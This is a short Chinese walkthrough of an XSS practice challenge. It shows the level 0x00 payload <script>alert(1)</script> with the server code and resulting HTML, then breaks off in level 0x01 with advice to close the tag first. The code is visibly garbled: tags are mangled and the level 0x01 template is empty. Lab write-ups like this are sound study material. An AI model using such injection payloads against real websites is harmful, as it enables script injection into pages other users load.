xss-haizi-me通关记录

xss-haizi-me通关记录

            • 0x00
            • 0x01
            • 0x02
            • 0x03
            • 0x04
            • 0x05
            • 0x06
            • 0x07
            • 0x08
            • 0x09
            • 0x0A
            • 0x0B
            • 0x0C
            • 0x0D
            • 0x0E
            • 0x0F
            • 0x10
            • 0x11
            • 0x12

传送门

0x00

server code:

function render (input) {
     
  return '
' + input + '
'
}

input code:

<script>alert(1)script>

html:

<div><script>alert(1)script>div>
0x01

server code:

function render (input) {
     
  return ''
}

这一关插入的地方在html标签里面,所以要先闭合